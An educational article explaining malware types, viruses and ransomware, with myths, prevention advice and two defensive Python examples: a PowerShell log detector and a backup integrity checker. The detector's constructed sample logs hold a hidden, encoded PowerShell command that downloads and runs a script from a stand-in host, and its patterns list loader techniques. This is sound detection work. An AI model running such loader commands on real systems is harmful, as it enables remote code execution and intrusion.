What Is Malware?
Malware, short for “malicious software”, is a general term for any code written to damage a device, steal or corrupt data, or give an attacker unauthorized access to a system. In cybersecurity, malware is usually the broadest term that can be used in most contexts. Ransomware and viruses are two types of malware. Other types of malware include:
- Spyware lets attackers monitor activity on a device. It silently gathers personal data, such as credit card numbers, usernames and passwords, that the attacker later uses to break into accounts and systems.
- Bots connect compromised machines to a command-and-control server. This network of machines is known as a botnet. Botnets can remain undetected even when they include millions of devices. Using the resources of the compromised machines, a botnet can send phishing messages and spam, steal personal information and launch distributed denial-of-service (DDoS) attacks.
- Rootkits let attackers keep privileged control of a device while hiding their presence from the user and from security tools. Once installed, a rootkit can change system configuration, conceal other processes and files, and download additional malicious components.
- Worms are programs that spread automatically between computers on the same network, without needing a host file or any user action. Worms can delete or modify information, steal data or install additional malware. Pure worms are less common today, but other malware still borrows their self-propagation technique.
- Trojan horses, unlike worms, do not spread on their own: they rely on the victim to run them. They are malware in disguise, typically posing as legitimate files or programs. Trojans mainly spread through phishing, but that is not the only way; they also appear as fake antivirus software that pops up on a website offering to protect your device. Once installed on a computer, a Trojan lets the attacker spy on the machine, modify data and, very often, install further malware.
- Adware is malware that shows itself as the familiar pop-up ads. It usually comes bundled with free games or other unlicensed programs. Sometimes the only harm it does is slow down your machine, but in some cases it also installs spyware.
- Fileless malware is malicious code that runs directly in memory and abuses trusted, already-installed tools such as PowerShell, WMI or the Windows script hosts instead of dropping its own executable. Because it writes little or nothing to disk, it leaves far fewer traces and is harder for file-based scanners to detect.
However, viruses and ransomware are the most widespread types of malware.
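Because fileless tooling leaves nothing for a file scanner to find, detection shifts to the telemetry it does leave, such as the command line of the PowerShell process. The following Python snippet is an added example, not code from the original article: it decodes PowerShell `-EncodedCommand` payloads found in constructed process-creation log lines (the `EventID=... User=... Cmd="..."` layout is an assumed, simplified schema, not any product's real format) and flags invocations that combine several typical in-memory loader indicators.

```python
"""Heuristic detector for fileless-style PowerShell launches.

Added example, not part of the original article. The log lines are constructed
and the 'EventID=... User=... Cmd="..."' layout is an assumed, simplified schema.
"""
import base64
import re
from typing import Optional

# Indicators typical of in-memory loaders: pull a script over HTTP and feed it to
# Invoke-Expression, hide the console window, skip profiles and execution policy.
INDICATORS = {
    r"\biex\b|invoke-expression": "invoke-expression",
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient": "web download",
    r"frombase64string": "embedded base64 payload",
    r"-w(indowstyle)?\s+hidden": "hidden window",
    r"-nop\b|-noprofile": "profile bypass",
    r"-ep\s+bypass|-executionpolicy\s+bypass": "execution-policy bypass",
}
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CMD_FIELD = re.compile(r'Cmd="([^"]*)"')


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload decoded from base64(UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Score one command line; the decoded payload is scanned alongside the raw text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = sorted(label for pat, label in INDICATORS.items()
                  if re.search(pat, text, re.IGNORECASE))
    if decoded is not None:
        hits.append("encoded command")
    # Two or more indicators together is the signal; any one alone is common in admin scripts.
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


def scan_logs(lines):
    """Return (user, indicators) for each process-creation record that looks suspicious."""
    findings = []
    for line in lines:
        cmd = CMD_FIELD.search(line)
        user = re.search(r"User=(\S+)", line)
        if not cmd:
            continue
        verdict = analyze_cmdline(cmd.group(1))
        if verdict["suspicious"]:
            findings.append((user.group(1) if user else "?", verdict["indicators"]))
    return findings


def _encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry): one routine admin task, two loaders.
SAMPLE_LOGS = [
    'EventID=4688 User=alice Cmd="powershell.exe -File C:\\scripts\\nightly-backup.ps1"',
    'EventID=4688 User=bob Cmd="powershell.exe -nop -w hidden -enc '
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")
    + '"',
    "EventID=4688 User=carol Cmd=\"powershell.exe -ep bypass -c "
    "IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQA=')))\"",
]

if __name__ == "__main__":
    for user, indicators in scan_logs(SAMPLE_LOGS):
        print(f"{user}: {', '.join(indicators)}")
```

The benign `-File` invocation produces no hits, while both loaders trip several indicators at once; requiring two or more keeps ordinary administrative use of `-NoProfile` or `Invoke-WebRequest` from drowning the alert queue. In production the same logic would run over Sysmon Event ID 1 or PowerShell script-block logs rather than constructed strings.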
What Is a Virus?
A virus is malicious code that attaches itself to legitimate files or programs and spreads through infected files and websites. When a device is exposed to a virus, the virus installs itself and starts running without the user’s knowledge. Viruses can corrupt data, damage a device and degrade its performance, in the worst case wiping the hard drive. Many viruses replicate and spread across a local network. Even a simple virus can significantly slow a system down by consuming memory and cause frequent crashes.
How do viruses spread?
Even careful system administrators and users who take precautions against malware have probably been exposed to a virus at some point. Viruses spread in various ways. A virus can get into a network through everyday activities like:
- Exchanging data between devices
- Visiting infected websites (a device can get infected even without downloading files)
- Downloading torrents, cracked software or other free programs from untrusted sources
- Using external storage devices (like USB drives) that were previously connected to an infected computer
- Opening infected email attachments
Viruses: myths and facts
Myth 1: You’ll definitely know when your computer gets infected.
Fact: Malware often spreads undetected. That’s why you won’t always be able to tell whether a device is infected.
Myth 2: Credible websites don’t contain viruses and other malware.
Fact: Attackers can run malicious ads (malvertising) on reputable websites. In the worst case, merely loading an ad, without clicking on it, is enough to install malware through a browser or plugin exploit. Even the most well-known websites are sometimes compromised and serve malware.
Myth 3: Apple devices are safe from viruses.
Fact: This is a deeply rooted misconception. Any device can get infected, whether it runs macOS, Windows, Linux or a mobile OS; attackers adapt their tools to every platform that is worth targeting.
Myth 4: Emails from credible sources can’t be infected. It’s always safe to open email attachments from trusted sources.
Fact: Even when an email appears to come from a trusted source (a colleague, a friend, etc.), there is no guarantee that it is safe. Some malware harvests the victim’s contact list and mails itself to those contacts, and a sender address can simply be forged. So, if an email attachment seems suspicious, don’t open it, even if you know the sender.
Myth 5: When there isn’t any critical data on a computer, malicious software is not a threat.
Fact: Even if a device stores nothing critical, malware is still a threat. Much malware is not after your data at all: it harvests your contact list to send spam, steals saved credentials, or uses the machine’s memory and processing power, and therefore the whole network’s, for the attacker’s own purposes.
Myth 6: Firewalls offer complete virus protection.
Fact: Firewalls mainly filter network traffic and block unauthorized connections. They cannot stop a user from opening a malicious attachment or running an infected download, so malware can still reach a device and spread inside the network.
What Is a Ransomware Virus?
Strictly speaking, there is no such thing as a “ransomware virus”. Unlike a virus, ransomware does not replicate itself by infecting other files, although criminals can use viruses or worms as part of a larger ransomware campaign. Ransomware is built on encryption, one of the most effective security technologies, originally created to protect data. Encryption transforms readable data into ciphertext that can only be turned back into the original by someone holding the decryption key; ransomware applies it to the victim’s files and keeps that key.
Attackers demand that victims pay a ransom, usually in Bitcoin or another cryptocurrency, to obtain the decryption key and regain access to their files. However, not all ransomware attacks aim for financial gain. With wipers disguised as ransomware (NotPetya, for example), the goal is disruption or data destruction, so the attackers may publish a fake wallet address, demand an unrealistic ransom, or simply have no working decryption key to hand over.
Naturally, companies fear lost customer trust and reputational damage, so paying the ransom looks like the quickest way out of the situation. However, paying the ransom never guarantees that you will regain access to your systems.
Instead of financing criminals and hoping to get your data back, a far better solution is to back up your workloads. The best approach to ransomware protection is a 3-2-1 backup plan that includes immutable and air-gapped copies: keep at least three (3) copies of your data (the production copy plus two backups), store them on two (2) different media, and keep one (1) of them offsite. Immutability prevents the backups from being overwritten or encrypted, and the air gap keeps the attacker from reaching them at all. With such a plan, recovery is fast and predictable, even after a ransomware attack.
How does ransomware spread?
Some of the most common ways that ransomware spreads are:
- Phishing emails include a malicious attachment or link. Once the attachment or link is opened, ransomware is downloaded and run on the machine. Sometimes the apparent sender is someone in your contacts.
- Messages on social media can carry a malicious link that launches ransomware on the device.
- Malicious websites can deploy ransomware just by being visited, typically through an exploit for an outdated browser or plugin. This is common on streaming video platforms and other free-content websites.
- Devices that already belong to a botnet (a network of compromised computers steered from a central server) are a ready target for follow-on infections: the existing foothold is used to load additional malware, including ransomware, onto them.
Ransomware: myths and facts
Myth 1: Ransomware attacks businesses and not individuals.
Fact: Ransomware doesn’t differentiate. Both individuals and businesses can be targets of ransomware attacks.
Myth 2: You always get data back after paying the ransom.
Fact: Many of those who pay never regain full access to their data: decryptors are often slow or buggy, and some attackers simply take the money. Paying the ransom seems like an easy and fast way to make the problem go away. However, paying finances cybercrime and gives attackers an incentive to carry out more attacks, with no guarantee that you will receive a working decryption key.
Myth 3: Ransomware can’t encrypt backups.
Fact: Regular backups are the best way to protect your data, but ransomware actively hunts for them: a backup stored on a reachable network share can be encrypted or corrupted along with everything else, and a backup taken after the infection started may already contain the malware. To mitigate these risks, run regular malware scans, follow the 3-2-1 backup rule, and protect backup data with encryption, immutability and role-based access control.
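To make the encryption and backup points above concrete, here is an added Python example (not code from the original article). It snapshots a small constructed workload into a SHA-256 manifest, simulates an encryptor by overwriting one live file with random bytes (no real ransomware logic is involved), and then verifies both the live tree and an untouched copy that stands in for the immutable, air-gapped backup. Encrypted output shows up twice: as a manifest mismatch and as a file whose byte entropy sits near 8 bits per byte, a level plain documents and configs never reach. The file names, their contents and the 7.2-bit threshold are assumptions made for the demonstration.

```python
"""Spot encrypted files and verify a backup copy against a hash manifest.

Added example, not part of the original article. File names, contents and the
entropy threshold are constructed assumptions for the demonstration.
"""
import hashlib
import math
import os
import shutil
import tempfile
from collections import Counter
from pathlib import Path

# Random-looking ciphertext sits close to 8 bits/byte; text, configs and most
# office documents are far lower. Compressed archives can exceed this, so in a
# real deployment the check is paired with the hash comparison below.
HIGH_ENTROPY = 7.2


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_manifest(root: Path) -> dict:
    """Map each file's path (relative to root) to its SHA-256, as taken at backup time."""
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def verify_tree(root: Path, manifest: dict) -> dict:
    """Compare a tree with the manifest: changed hashes, missing files, encrypted-looking content."""
    report = {"modified": [], "missing": [], "high_entropy": []}
    for rel, digest in manifest.items():
        path = root / rel
        if not path.exists():
            report["missing"].append(rel)
            continue
        data = path.read_bytes()
        if hashlib.sha256(data).hexdigest() != digest:
            report["modified"].append(rel)
        if shannon_entropy(data) > HIGH_ENTROPY:
            report["high_entropy"].append(rel)
    return report


def demo():
    """Snapshot a constructed workload, simulate an encryptor on the live copy, verify both copies."""
    with tempfile.TemporaryDirectory() as tmp:
        live, backup = Path(tmp) / "live", Path(tmp) / "backup"
        live.mkdir()
        # Constructed sample data, not real files.
        (live / "notes.txt").write_text("quarterly numbers and meeting notes\n" * 100)
        (live / "config.ini").write_text("[db]\nhost=localhost\nport=5432\n" * 20)
        manifest = build_manifest(live)
        # The copy stands in for the immutable/air-gapped backup the attacker cannot reach.
        shutil.copytree(live, backup)
        # Simulated ransomware: replace one file with random bytes, which is what
        # an encryptor's output looks like on disk. No real ransomware logic here.
        (live / "notes.txt").write_bytes(os.urandom(4096))
        return verify_tree(live, manifest), verify_tree(backup, manifest)


if __name__ == "__main__":
    live_report, backup_report = demo()
    print("live  :", live_report)
    print("backup:", backup_report)
```

The live tree reports `notes.txt` as both modified and high-entropy, while the untouched copy matches the manifest exactly, which is the property an immutable backup is supposed to give you. Storing the manifest with the backup and re-running the verification before every restore catches a backup that was silently encrypted long before anyone noticed the ransom note.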
How to avoid ransomware, viruses and other threatware?
After learning the differences between the types of malware, the first question that comes to mind is: can a malware attack be prevented? There are several ways to keep a device from getting infected. The best approach is to follow basic cybersecurity rules:
- Install antivirus, antispyware and firewall protection, and keep it up to date.
- Update your operating system and applications regularly.
- Harden your browser security settings and block pop-ups.
- Avoid opening messages and emails from unknown senders.
- Don’t open suspicious attachments, links and websites.
- Check the reputation of free programs and files before downloading them.
- Set strong, unique passwords, enable multi-factor authentication where it is offered, and change credentials whenever you suspect they have been exposed.
Sticking to these rules minimizes the risk of malicious software infecting a device. However, nothing guarantees 100% security. That’s why it is crucial to back up your data in multiple locations, preferably following the 3-2-1 backup plan with immutable, encrypted and air-gapped backups. This way, even after a ransomware attack, you will be able to restore your data with a few clicks.